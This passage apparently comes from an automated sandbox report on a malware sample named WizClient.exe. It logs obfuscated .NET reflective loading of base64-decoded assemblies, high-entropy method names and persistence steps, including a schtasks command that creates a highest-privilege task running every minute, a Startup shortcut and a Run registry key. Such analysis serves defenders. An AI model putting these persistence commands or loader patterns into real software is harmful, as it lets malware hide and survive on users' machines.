            Source: WizClient.exe, Ek86NJ4u0lYNcFFfGPaK8N7q4H.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[1] { geWIIr7x7GJsduXCoae9cccbwJ[2] }}, (string[])null, (Type[])null, (bool[])null, true)
            Source: WizClient.exe.3.dr, Ek86NJ4u0lYNcFFfGPaK8N7q4H.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[5]{RbAyA3NkD73ndjqtSc3P2WGRUy4z3JhkJuFsryUZXwwnhEEVivpZEtp0sNa6yGwI8IIDaFDXb8QQoc2GSnKL.Coad1DPY7sC43KcTvVUnAO2DgTLNFv466qKrBHXC91eN9FaVUn2WoCKrZLKhclxSmjDguh5VL2r2RHyqglIa,RbAyA3NkD73ndjqtSc3P2WGRUy4z3JhkJuFsryUZXwwnhEEVivpZEtp0sNa6yGwI8IIDaFDXb8QQoc2GSnKL.L2I7pzHjRmoBi4cye3gJurmEISx4QfhquyCws2IOL2hg4h11WpeiwPch5bh0gtrdVDlR2KD32o5kaCgZm6m2,RbAyA3NkD73ndjqtSc3P2WGRUy4z3JhkJuFsryUZXwwnhEEVivpZEtp0sNa6yGwI8IIDaFDXb8QQoc2GSnKL.Wvvy1iYMneGe9YwQ784MfLZ4bxZCi2EU0gmKZK4bBPwplkz55RtAZHWy0x5j5XucR4erAve6p4IEp8QG0XeU,RbAyA3NkD73ndjqtSc3P2WGRUy4z3JhkJuFsryUZXwwnhEEVivpZEtp0sNa6yGwI8IIDaFDXb8QQoc2GSnKL.MjTFhsuWA4H4N5aXgTdwIC3PL0Y4JtKKnyctsnDwtrZdBhvr8akxbu6PLaMEQwwB2b3q0zca6KtDSIyC4Vu5,SWnjqHSOHIHFr4WnpEsMxJbTMM3nl233qOGFtEUGrNNAcbuz7qZJv25QLZ.E8wnMQHnQIkZsPr01twEFbqglnlPeggTA2VQNUZd8z2fkqKzxa07NembiK()}}, (string[])null, (Type[])null, (bool[])null, true)
            Source: WizClient.exe.3.dr, Ek86NJ4u0lYNcFFfGPaK8N7q4H.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[2]{geWIIr7x7GJsduXCoae9cccbwJ[2],SWnjqHSOHIHFr4WnpEsMxJbTMM3nl233qOGFtEUGrNNAcbuz7qZJv25QLZ.s4ks59xP6h8SUYQivT(Convert.FromBase64String(geWIIr7x7GJsduXCoae9cccbwJ[3]))}}, (string[])null, (Type[])null, (bool[])null, true)
            Source: WizClient.exe.3.dr, Ek86NJ4u0lYNcFFfGPaK8N7q4H.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[1] { geWIIr7x7GJsduXCoae9cccbwJ[2] }}, (string[])null, (Type[])null, (bool[])null, true)
            Source: WizClient.exe, Ek86NJ4u0lYNcFFfGPaK8N7q4H.cs.Net Code: k6zBEkqlcFwI5qkVNlGQVybSfc System.AppDomain.Load(byte[])
            Source: WizClient.exe, Ek86NJ4u0lYNcFFfGPaK8N7q4H.cs.Net Code: _5feqF394duQ7VNUjCTZzXl8ROf System.AppDomain.Load(byte[])
            Source: WizClient.exe, Ek86NJ4u0lYNcFFfGPaK8N7q4H.cs.Net Code: _5feqF394duQ7VNUjCTZzXl8ROf
            Source: WizClient.exe, SWnjqHSOHIHFr4WnpEsMxJbTMM3nl233qOGFtEUGrNNAcbuz7qZJv25QLZ.cs.Net Code: _0xlIpOSayh3mc1XcyEZAya6n2A4KI7ELXvVMEuPB4fIWMTIWRUuzuQAxyZ System.AppDomain.Load(byte[])
            Source: WizClient.exe.3.dr, Ek86NJ4u0lYNcFFfGPaK8N7q4H.cs.Net Code: k6zBEkqlcFwI5qkVNlGQVybSfc System.AppDomain.Load(byte[])
            Source: WizClient.exe.3.dr, Ek86NJ4u0lYNcFFfGPaK8N7q4H.cs.Net Code: _5feqF394duQ7VNUjCTZzXl8ROf System.AppDomain.Load(byte[])
            Source: WizClient.exe.3.dr, Ek86NJ4u0lYNcFFfGPaK8N7q4H.cs.Net Code: _5feqF394duQ7VNUjCTZzXl8ROf
            Source: WizClient.exe.3.dr, SWnjqHSOHIHFr4WnpEsMxJbTMM3nl233qOGFtEUGrNNAcbuz7qZJv25QLZ.cs.Net Code: _0xlIpOSayh3mc1XcyEZAya6n2A4KI7ELXvVMEuPB4fIWMTIWRUuzuQAxyZ System.AppDomain.Load(byte[])
            Source: C:\Users\user\Desktop\WizClient.exeCode function: 3_2_00007FF7C7C677F1 push ss; retf 3_2_00007FF7C7C67C11
            Source: C:\Users\user\Desktop\WizClient.exeCode function: 3_2_00007FF7C7C681B1 push ss; retf 3_2_00007FF7C7C68452
            Source: C:\Users\user\Desktop\WizClient.exeCode function: 3_2_00007FF7C7C685A1 push ss; retf 3_2_00007FF7C7C6898D
            Source: C:\Users\user\Desktop\WizClient.exeCode function: 3_2_00007FF7C7C6D0F5 push ss; retf 3_2_00007FF7C7C6D14E
            Source: C:\Users\user\Desktop\WizClient.exeCode function: 3_2_00007FF7C7C648DE push ss; retf 3_2_00007FF7C7C6491E
            Source: C:\Users\user\Desktop\WizClient.exeCode function: 3_2_00007FF7C7C6A10A push ss; retf 3_2_00007FF7C7C6A30A
            Source: C:\Users\user\Desktop\WizClient.exeCode function: 3_2_00007FF7C7C6A0AC push ss; retf 3_2_00007FF7C7C6A107
            Source: C:\Users\user\Desktop\WizClient.exeCode function: 3_2_00007FF7C7C640D1 push es; iretd 3_2_00007FF7C7C640D2
            Source: C:\Users\user\Desktop\WizClient.exeCode function: 3_2_00007FF7C7C600BD pushad ; iretd 3_2_00007FF7C7C600C1
            Source: C:\Users\user\Desktop\WizClient.exeCode function: 3_2_00007FF7C7C66BA9 push ss; retf 3_2_00007FF7C7C66D03
            Source: C:\Users\user\Desktop\WizClient.exeCode function: 3_2_00007FF7C7C67776 push ss; retf 3_2_00007FF7C7C677EE
            Source: C:\Users\user\Desktop\WizClient.exeCode function: 3_2_00007FF7C7C66B2D push ss; retf 3_2_00007FF7C7C66BA6
            Source: C:\Users\user\Desktop\WizClient.exeCode function: 3_2_00007FF7C7C672F1 push ss; retf 3_2_00007FF7C7C6766E
            Source: C:\Users\user\Desktop\WizClient.exeCode function: 3_2_00007FF7C7C67279 push ss; retf 3_2_00007FF7C7C672EE
            Source: C:\Users\user\Desktop\WizClient.exeCode function: 3_2_00007FF7C7C64234 push ds; iretd 3_2_00007FF7C7C64252
            Source: C:\Users\user\Desktop\WizClient.exeCode function: 3_2_00007FF7C7C655F0 push ss; retf 3_2_00007FF7C7C657BC
            Source: C:\Users\user\Desktop\WizClient.exeCode function: 3_2_00007FF7C7C67DB1 push ss; retf 3_2_00007FF7C7C68069
            Source: C:\Users\user\Desktop\WizClient.exeCode function: 3_2_00007FF7C7C645C1 push ss; retf 3_2_00007FF7C7C64800
            Source: C:\Users\user\Desktop\WizClient.exeCode function: 3_2_00007FF7C7C64576 push ss; retf 3_2_00007FF7C7C645BE
            Source: C:\Users\user\Desktop\WizClient.exeCode function: 3_2_00007FF7C7C65590 push ss; retf 3_2_00007FF7C7C655ED
            Source: C:\Users\user\Desktop\WizClient.exeCode function: 3_2_00007FF7C7C68136 push ss; retf 3_2_00007FF7C7C681AE
            Source: C:\Users\user\Desktop\WizClient.exeCode function: 3_2_00007FF7C7C68522 push ss; retf 3_2_00007FF7C7C6859E
            Source: C:\Users\user\Desktop\WizClient.exeCode function: 3_2_00007FF7C7C64921 push ss; retf 3_2_00007FF7C7C64B5B
            Source: C:\Users\user\Desktop\WizClient.exeCode function: 3_2_00007FF7C7C67D4E push ss; retf 3_2_00007FF7C7C67DAE
            Source: C:\Users\user\Desktop\WizClient.exeCode function: 3_2_00007FF7C7C64154 push cs; iretd 3_2_00007FF7C7C64162
            Source: C:\Users\user\Desktop\WizClient.exeCode function: 3_2_00007FF7C7C6D151 push ss; retf 3_2_00007FF7C7C6D376
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_00007FF7C7B5D2A5 pushad ; iretd 5_2_00007FF7C7B5D2A6
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_00007FF7C7C700BD pushad ; iretd 5_2_00007FF7C7C700C1
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_00007FF7C7C7347F push esp; iretd 5_2_00007FF7C7C73482
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_00007FF7C7D42316 push 8B485F93h; iretd 5_2_00007FF7C7D4231B
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_00007FF7C7B4D2A5 pushad ; iretd 8_2_00007FF7C7B4D2A6
            Source: WizClient.exe, v7jmoq7vyUxZj5GLQy.csHigh entropy of concatenated method names: 'MmN0FmIMtYVN05xE2a2SI67X1LdRxn5qq1o6hZg0hgXpSoEjdWYYWQwtZpqkCFqgwbCxJ1bAMoEn8PsUEiaQyrqHHIpP6u', 'D5K6QtBL7YX9j8shjpNrHmbWvMOKI1NKnrv3LLToieJOvNxFhjwLcOsIcSVhba6R7egStPTa9qy40EoPWslq0nKG9dQ4Ew', 'GNt2IYYItY71MbKVk2ax9yU73SbXgV3Pg4ODuKnAiOUSJh0wNqnv4JdqwxP3lnl7YcIOnD40DmVpbi9NyiO9qNn3OQ59D7', 'vASQ2KBbLD9j7', 'SSLVFt0SvFjzU', 'bLFRoghNK3VkU', '_9GdeX3Y7PCodh', 'EmymVY5mhqQyr', 'DZL8tCEh9u9j7', 'JrTWlESzBiMTG'
            Source: WizClient.exe, QjvPgD1dYTpr14dXdxXBUx62yNnbbzHCXcLPM1IKX99KlR0DtfEprtJFnenFcJrWOO7vOQRiyvPOjOBtTItR.csHigh entropy of concatenated method names: 'Equals', 'GetHashCode', 'GetType', 'ToString', 'Create__Instance__', 'Dispose__Instance__', 'IYLg9Au3YgMeJL6Nb8PWW', 'mZ32kzeW50ooku7JRDXtE', 'ScDS9bYAjIa5v3gXUIx4U', '_7WlYQFxDwJVDMnMr0nQbM'
            Source: WizClient.exe, qOlbqtOy3nZsg049IR9xh9XXfTtsI69WcgczyQuOaYa9BTHpYkbGuudjcn.csHigh entropy of concatenated method names: 'HOuEa3Zvj1bkpXohST39J5fUpTGELwiH1w9ETx0MHtMD1dM738PGIQ4gPq', 'AunpeS6JAWa5d3UXyC9Oeuny3RnP8XtqTKhBiYXGRJhtQLOalfC2s8H6Ov', 'U2tyQESLw9mPfb4kfGr63OtVHkXQBtoyssfO7mqifg3PDWRLFLnf0JWRT9', 'j3lCJ4fW13qxuAeSdtwBeoa8j9mXdchzVhTS7X5LLXcREcQs9TaJOpHYfv', 'hpzGed2WF0bp5wkb53XoytNT4BzOR8VgDu4Rr1x47qifaJyXXlD3SYYHmCLl6wvAzIQg2cc', 'DoWPuwYC5HplI0bQlXwbinY0honWSMWdFZPymWhj9a3z10ygkW2asVai2wjVXL5Iu1nTDcU', '_3fimPMffWtclg46LH0mYTJRunZJ4C26sm4Duo7StywgtSvL47MFdVPRBKq3M0jO7BfoEIi6', 'XUhpihiWkbyxcyE8iQizrHqZ06aa6uOkgh0jL8WEroRlNPk0wpGmcFX3Rh0LQq0uapOWCEh', 'ee4SevjyWpRtlJDYFZthMDHsdDlVkFeRfLFdlrJKaBCLgwZoUaGmbpqKlcmDrLq3JpQx7P7', 'm8pZwWnmeWQKM8QhlprkEfxKa1tZqPL7RLoUy8h3kfhUPgKoMoxuFEe6q61NjiN9Tl4HPcd'
            Source: WizClient.exe, Ek86NJ4u0lYNcFFfGPaK8N7q4H.csHigh entropy of concatenated method names: 'kwOYrNRJ3t54pzdK0wDsTyjfZr', 'k6zBEkqlcFwI5qkVNlGQVybSfc', '_967p4QzWzl4sjKjVI6LP6JovKz', '_38yWIY4pjOhGkxnUFgkKDH2wqc', 'CeP4lJb4SLZay5YCFNbHphU6zz', 'lMj2dWg45B9x6dHekDnMeE4JBJ', 'nbVDNLODmndVuHchyj3jaJb5ZS', 'zq00kEvWqPjL2yQgQ7NsTefceq', '_9LFmKwmtzNt6KW1TJCG3h72Pmv', '_2InWy99wCgxUKpSsqrYM7QR7Bb'
            Source: WizClient.exe, 0P7cX6mhUWvCKl1xVWC4KX2tdlAwsSBqffiDvrTAddY5PeYXwvnz1VdzUzzPuY88ZQ1SDktdlp2v1KbkO4wA.csHigh entropy of concatenated method names: 'ZdE9TnILk7UK8Ctn1X9xIloiW3fzpsIplUvT2WEzLppgsA5zkMvq2n6twfljtG6Uq78eevWWlXDzWdU45xJL', 'tLC86auKj0WQzGntU9j93omchx1HSt3sOsqPUt9IN5dWTyjqc1gQilcYyFqwcUokKo3LXV8GgA06VXXnKVYO', 'uLApGWAUlqqkirAJ6FbGrcWPl5Hm7fAyOEwkBKVIPlXIosI9oJ0zk9II1AAgewtJKeVCDct6paVnhQkivGKU', '_526E1qBqFfCe0HOml1ZXhkBeRQJwpat0gzaDIDcWQbk9WzcrpqygzP7NcRJUebbZZoCBa8u7sDMBmO4J7ltn', 'H73t7bcMbKelzqH9DHxcxxaTr8', '_2c5SQaPBj6jsR3k1gQZS1wZkx0', 'VsHwyy5CymRiBG0EHkd4X', 'cdPFcBTrnStZZIXmXOZEk', 'J63UVNlhwtAHe1zbkVQh6', '_2o5j3O6uRLVayWVcchPgc'
            Source: WizClient.exe, MNnxWzFHJ2Ct5plUS0TNIf6CaXhblonCfU6C8N8NjeADq3IH21Ggp5wQZS.csHigh entropy of concatenated method names: 'P52Oul3OvEUaTGWtu7esVhC4nFKBzTJgtgWWYCGOXrrdvfAve4HpdUfmnA', 'JsKdkvtGmfBzMs4W2Kct4KN63xJfoyDOlpLoKhdXd1R7XQi5QkFGObCUQL33BRgzNRzLIF9', '_699wu3u0UTRUiEqp6y47oIBIa1VzwpHSkTIfL0Q07kjEQAb4Yh8cdtV3x0sqw5iK7KgOTfo', 'dchtpDAHa96lz91p0DFKqv2sCKM69ttmyrJMafceOAvT97btRovWIsllTexOeNUndDwRGK6', 'XXiTN4ZGSvZH550XttE2YGCCfXw8eGwpL1ymQxRvWN5JHpN9mZAaUI7ruhkHWFnyewe3vNh'
            Source: WizClient.exe, LmsEL10c0LQ0GfKv8vXLMbVMAS.csHigh entropy of concatenated method names: 'BsuajXCmmq73QtMRZgxz6iLzLW', 'q4hMCmCkhkejDGnxNXAJiFrQVV', 'Iy0PglG8N90fmPknsvMjR2o4Oq', '_7LhFRYfL6Vdw6IjgT058kw9T98', 'uozjmRxdiUarqB46zF5JNMzlFC', 'HBm9tCahLIjtkawviQxzYCNG3HODqyt9DJWXfQK1WCwgiVlhXNprxXxHgA', 'n4VhXOhRSBX94AGqZAMcl1JiUwJjDQLEXdATvl1QqkDw9mR1aWUoJZDG3w', 'clxHfQspzu095U3JiL4nelLH7QgvjonqUqUr28Q5HfANUnUT6ppXMDhIou', 'UJhsB9LByePKWUXSnUHOIs4axTdfr0beJZzOhFjJfNQxuzhXSOYOMYVKnv', 'sxe9wv47f9yWp6ZpoKSt2qo7Dte0FArsKcErFtsj0rduqjtTLuc6suSUn0'
            Source: WizClient.exe, SWnjqHSOHIHFr4WnpEsMxJbTMM3nl233qOGFtEUGrNNAcbuz7qZJv25QLZ.csHigh entropy of concatenated method names: '_6h8Z4ist3loJG9DkEkvXiJ5y14rQDEKhLtqiHcH0KsY4vWf8QPXip4W6xs', 'NgDjqwloMfLXHy24Pvvrxk5BtSt8rwUdoLmtowCJZwo7adV23Psv9Gw2iW', 'coLP3NtnRnckEUoqrE9wTMfWC53TLLTHtSmBvH8jEUzinPdU2ePrEEU4Ot', 'MJxVb273xXPrzvyWNqriWohVB46XQ1lCg7MJFaC4meIit4WrYYuABqUcuP', 'D7AJUPhuHrjMr6mheZlIA8xip09HhxvsnkDvd2Cy0YiQ06fyxVslFucJOQ', 'rpFCk9LIWYjgDlz5LQeNvwGlwgnFaxhRPyMcNNOteakUJB9GFXb9Bnhc5P', 'Ps6Wx0i9xfH8ZPBoLzukJY9hRmVVvMKQYt8x0w4yOgHOg2e2NIqOc5Av4c', 'vpRGMI7L36biZK4ls07oB8TtHseipkPD2qpOId8oiQyZPwduyAf8y9aZ9i', '_0saOAClBBCrUBZqS0rQqAXoDAt0AACsMSeRzLKkuc3MHMFfb6TUsESUdgC', 'UtPBnGBAluLu0XsTlVry8F99bn1DNqU3RMccXBkrFU8aUQQKCxL2U1GSwb'
            Source: WizClient.exe, aiCsB5NUHwfKY0UEXSFHtMA6LD.csHigh entropy of concatenated method names: 'A0tuI0bLer3YTx1jA6EEESfGTa', 'cqXrlIY5WB7vZd1mZr48EJ8tkWxeP915IVjaFlkNRA3EJE7DvqV0Pl5tgFFa0jGhRZttvLsMVbvEB0KtxBtHaD', 'XYrNc729kyWU1r27HKZsE1MuwH6zaiVIQ7RKXAxfMyaoMvB0qKTMh1rHfJcT21PIDQ9kR6tqArXoJL9zPoU1Z3', 'DSli6v94EtYJCwVNnMmAuo2uR1Y3DahwSOgR3oemlUDY0nppG2OIigsKncXAzukOeQYytzX72xa7zMyoSPe1Uz', '_3ZtZir52XfXobJO0MDmwdRmuHt1IIrliyf3GdQXrHmOoeDX7CifdEt2RIjuyHTd4OxCvQi1hErWEFRWnyJBmlV'
            Source: WizClient.exe, shmYJX63MoDoDf0kg7JYt6GmNt.csHigh entropy of concatenated method names: '_7LdIpktSdxVScKmQazIPcc9yZD', '_8l8X6QalFJY7Q2AWjHkgqebmhV', '_8G1rMDOqFEvCny1AafZz38l9Uq', 'lziHXKhxa6RF21QVoeUbyRSyPw', '_1S0umYTw98MYOI8wmuriFSrVbD', 'KqNsuo7CAmtxPKItURTsyO0s0Y', '_59DE5ZeRaSNInNOKz7JRVhoDUB', 'PC97umrvLy9wTTb1tQW0IzW8nK', 'TIPRZU6wqjGuKMDhXLxlXYLWnb', 'yuTxu678GPrCbenOoi3eoivM7y'
            Source: WizClient.exe.3.dr, v7jmoq7vyUxZj5GLQy.csHigh entropy of concatenated method names: 'MmN0FmIMtYVN05xE2a2SI67X1LdRxn5qq1o6hZg0hgXpSoEjdWYYWQwtZpqkCFqgwbCxJ1bAMoEn8PsUEiaQyrqHHIpP6u', 'D5K6QtBL7YX9j8shjpNrHmbWvMOKI1NKnrv3LLToieJOvNxFhjwLcOsIcSVhba6R7egStPTa9qy40EoPWslq0nKG9dQ4Ew', 'GNt2IYYItY71MbKVk2ax9yU73SbXgV3Pg4ODuKnAiOUSJh0wNqnv4JdqwxP3lnl7YcIOnD40DmVpbi9NyiO9qNn3OQ59D7', 'vASQ2KBbLD9j7', 'SSLVFt0SvFjzU', 'bLFRoghNK3VkU', '_9GdeX3Y7PCodh', 'EmymVY5mhqQyr', 'DZL8tCEh9u9j7', 'JrTWlESzBiMTG'
            Source: WizClient.exe.3.dr, QjvPgD1dYTpr14dXdxXBUx62yNnbbzHCXcLPM1IKX99KlR0DtfEprtJFnenFcJrWOO7vOQRiyvPOjOBtTItR.csHigh entropy of concatenated method names: 'Equals', 'GetHashCode', 'GetType', 'ToString', 'Create__Instance__', 'Dispose__Instance__', 'IYLg9Au3YgMeJL6Nb8PWW', 'mZ32kzeW50ooku7JRDXtE', 'ScDS9bYAjIa5v3gXUIx4U', '_7WlYQFxDwJVDMnMr0nQbM'
            Source: WizClient.exe.3.dr, qOlbqtOy3nZsg049IR9xh9XXfTtsI69WcgczyQuOaYa9BTHpYkbGuudjcn.csHigh entropy of concatenated method names: 'HOuEa3Zvj1bkpXohST39J5fUpTGELwiH1w9ETx0MHtMD1dM738PGIQ4gPq', 'AunpeS6JAWa5d3UXyC9Oeuny3RnP8XtqTKhBiYXGRJhtQLOalfC2s8H6Ov', 'U2tyQESLw9mPfb4kfGr63OtVHkXQBtoyssfO7mqifg3PDWRLFLnf0JWRT9', 'j3lCJ4fW13qxuAeSdtwBeoa8j9mXdchzVhTS7X5LLXcREcQs9TaJOpHYfv', 'hpzGed2WF0bp5wkb53XoytNT4BzOR8VgDu4Rr1x47qifaJyXXlD3SYYHmCLl6wvAzIQg2cc', 'DoWPuwYC5HplI0bQlXwbinY0honWSMWdFZPymWhj9a3z10ygkW2asVai2wjVXL5Iu1nTDcU', '_3fimPMffWtclg46LH0mYTJRunZJ4C26sm4Duo7StywgtSvL47MFdVPRBKq3M0jO7BfoEIi6', 'XUhpihiWkbyxcyE8iQizrHqZ06aa6uOkgh0jL8WEroRlNPk0wpGmcFX3Rh0LQq0uapOWCEh', 'ee4SevjyWpRtlJDYFZthMDHsdDlVkFeRfLFdlrJKaBCLgwZoUaGmbpqKlcmDrLq3JpQx7P7', 'm8pZwWnmeWQKM8QhlprkEfxKa1tZqPL7RLoUy8h3kfhUPgKoMoxuFEe6q61NjiN9Tl4HPcd'
            Source: WizClient.exe.3.dr, Ek86NJ4u0lYNcFFfGPaK8N7q4H.csHigh entropy of concatenated method names: 'kwOYrNRJ3t54pzdK0wDsTyjfZr', 'k6zBEkqlcFwI5qkVNlGQVybSfc', '_967p4QzWzl4sjKjVI6LP6JovKz', '_38yWIY4pjOhGkxnUFgkKDH2wqc', 'CeP4lJb4SLZay5YCFNbHphU6zz', 'lMj2dWg45B9x6dHekDnMeE4JBJ', 'nbVDNLODmndVuHchyj3jaJb5ZS', 'zq00kEvWqPjL2yQgQ7NsTefceq', '_9LFmKwmtzNt6KW1TJCG3h72Pmv', '_2InWy99wCgxUKpSsqrYM7QR7Bb'
            Source: WizClient.exe.3.dr, 0P7cX6mhUWvCKl1xVWC4KX2tdlAwsSBqffiDvrTAddY5PeYXwvnz1VdzUzzPuY88ZQ1SDktdlp2v1KbkO4wA.csHigh entropy of concatenated method names: 'ZdE9TnILk7UK8Ctn1X9xIloiW3fzpsIplUvT2WEzLppgsA5zkMvq2n6twfljtG6Uq78eevWWlXDzWdU45xJL', 'tLC86auKj0WQzGntU9j93omchx1HSt3sOsqPUt9IN5dWTyjqc1gQilcYyFqwcUokKo3LXV8GgA06VXXnKVYO', 'uLApGWAUlqqkirAJ6FbGrcWPl5Hm7fAyOEwkBKVIPlXIosI9oJ0zk9II1AAgewtJKeVCDct6paVnhQkivGKU', '_526E1qBqFfCe0HOml1ZXhkBeRQJwpat0gzaDIDcWQbk9WzcrpqygzP7NcRJUebbZZoCBa8u7sDMBmO4J7ltn', 'H73t7bcMbKelzqH9DHxcxxaTr8', '_2c5SQaPBj6jsR3k1gQZS1wZkx0', 'VsHwyy5CymRiBG0EHkd4X', 'cdPFcBTrnStZZIXmXOZEk', 'J63UVNlhwtAHe1zbkVQh6', '_2o5j3O6uRLVayWVcchPgc'
            Source: WizClient.exe.3.dr, MNnxWzFHJ2Ct5plUS0TNIf6CaXhblonCfU6C8N8NjeADq3IH21Ggp5wQZS.csHigh entropy of concatenated method names: 'P52Oul3OvEUaTGWtu7esVhC4nFKBzTJgtgWWYCGOXrrdvfAve4HpdUfmnA', 'JsKdkvtGmfBzMs4W2Kct4KN63xJfoyDOlpLoKhdXd1R7XQi5QkFGObCUQL33BRgzNRzLIF9', '_699wu3u0UTRUiEqp6y47oIBIa1VzwpHSkTIfL0Q07kjEQAb4Yh8cdtV3x0sqw5iK7KgOTfo', 'dchtpDAHa96lz91p0DFKqv2sCKM69ttmyrJMafceOAvT97btRovWIsllTexOeNUndDwRGK6', 'XXiTN4ZGSvZH550XttE2YGCCfXw8eGwpL1ymQxRvWN5JHpN9mZAaUI7ruhkHWFnyewe3vNh'
            Source: WizClient.exe.3.dr, LmsEL10c0LQ0GfKv8vXLMbVMAS.csHigh entropy of concatenated method names: 'BsuajXCmmq73QtMRZgxz6iLzLW', 'q4hMCmCkhkejDGnxNXAJiFrQVV', 'Iy0PglG8N90fmPknsvMjR2o4Oq', '_7LhFRYfL6Vdw6IjgT058kw9T98', 'uozjmRxdiUarqB46zF5JNMzlFC', 'HBm9tCahLIjtkawviQxzYCNG3HODqyt9DJWXfQK1WCwgiVlhXNprxXxHgA', 'n4VhXOhRSBX94AGqZAMcl1JiUwJjDQLEXdATvl1QqkDw9mR1aWUoJZDG3w', 'clxHfQspzu095U3JiL4nelLH7QgvjonqUqUr28Q5HfANUnUT6ppXMDhIou', 'UJhsB9LByePKWUXSnUHOIs4axTdfr0beJZzOhFjJfNQxuzhXSOYOMYVKnv', 'sxe9wv47f9yWp6ZpoKSt2qo7Dte0FArsKcErFtsj0rduqjtTLuc6suSUn0'
            Source: WizClient.exe.3.dr, SWnjqHSOHIHFr4WnpEsMxJbTMM3nl233qOGFtEUGrNNAcbuz7qZJv25QLZ.csHigh entropy of concatenated method names: '_6h8Z4ist3loJG9DkEkvXiJ5y14rQDEKhLtqiHcH0KsY4vWf8QPXip4W6xs', 'NgDjqwloMfLXHy24Pvvrxk5BtSt8rwUdoLmtowCJZwo7adV23Psv9Gw2iW', 'coLP3NtnRnckEUoqrE9wTMfWC53TLLTHtSmBvH8jEUzinPdU2ePrEEU4Ot', 'MJxVb273xXPrzvyWNqriWohVB46XQ1lCg7MJFaC4meIit4WrYYuABqUcuP', 'D7AJUPhuHrjMr6mheZlIA8xip09HhxvsnkDvd2Cy0YiQ06fyxVslFucJOQ', 'rpFCk9LIWYjgDlz5LQeNvwGlwgnFaxhRPyMcNNOteakUJB9GFXb9Bnhc5P', 'Ps6Wx0i9xfH8ZPBoLzukJY9hRmVVvMKQYt8x0w4yOgHOg2e2NIqOc5Av4c', 'vpRGMI7L36biZK4ls07oB8TtHseipkPD2qpOId8oiQyZPwduyAf8y9aZ9i', '_0saOAClBBCrUBZqS0rQqAXoDAt0AACsMSeRzLKkuc3MHMFfb6TUsESUdgC', 'UtPBnGBAluLu0XsTlVry8F99bn1DNqU3RMccXBkrFU8aUQQKCxL2U1GSwb'
            Source: WizClient.exe.3.dr, aiCsB5NUHwfKY0UEXSFHtMA6LD.csHigh entropy of concatenated method names: 'A0tuI0bLer3YTx1jA6EEESfGTa', 'cqXrlIY5WB7vZd1mZr48EJ8tkWxeP915IVjaFlkNRA3EJE7DvqV0Pl5tgFFa0jGhRZttvLsMVbvEB0KtxBtHaD', 'XYrNc729kyWU1r27HKZsE1MuwH6zaiVIQ7RKXAxfMyaoMvB0qKTMh1rHfJcT21PIDQ9kR6tqArXoJL9zPoU1Z3', 'DSli6v94EtYJCwVNnMmAuo2uR1Y3DahwSOgR3oemlUDY0nppG2OIigsKncXAzukOeQYytzX72xa7zMyoSPe1Uz', '_3ZtZir52XfXobJO0MDmwdRmuHt1IIrliyf3GdQXrHmOoeDX7CifdEt2RIjuyHTd4OxCvQi1hErWEFRWnyJBmlV'
            Source: WizClient.exe.3.dr, shmYJX63MoDoDf0kg7JYt6GmNt.csHigh entropy of concatenated method names: '_7LdIpktSdxVScKmQazIPcc9yZD', '_8l8X6QalFJY7Q2AWjHkgqebmhV', '_8G1rMDOqFEvCny1AafZz38l9Uq', 'lziHXKhxa6RF21QVoeUbyRSyPw', '_1S0umYTw98MYOI8wmuriFSrVbD', 'KqNsuo7CAmtxPKItURTsyO0s0Y', '_59DE5ZeRaSNInNOKz7JRVhoDUB', 'PC97umrvLy9wTTb1tQW0IzW8nK', 'TIPRZU6wqjGuKMDhXLxlXYLWnb', 'yuTxu678GPrCbenOoi3eoivM7y'
            Source: C:\Users\user\Desktop\WizClient.exe File created: C:\Users\user\AppData\Local\WizClient.exe

            Boot Survival

            Source: C:\Users\user\Desktop\WizClient.exe Process created: C:\Windows\System32\schtasks.exe "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "WizClient" /tr "C:\Users\user\AppData\Local\WizClient.exe"
            Source: C:\Users\user\Desktop\WizClient.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\WizClient.lnk
            Source: C:\Users\user\Desktop\WizClient.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run WizClient

            Hooking and other Techniques for Hiding and Protection

            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
            Source: C:\Users\user\Desktop\WizClient.exe Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot
            Source: C:\Users\user\Desktop\WizClient.exe Process information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\WizClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\WizClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\WizClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
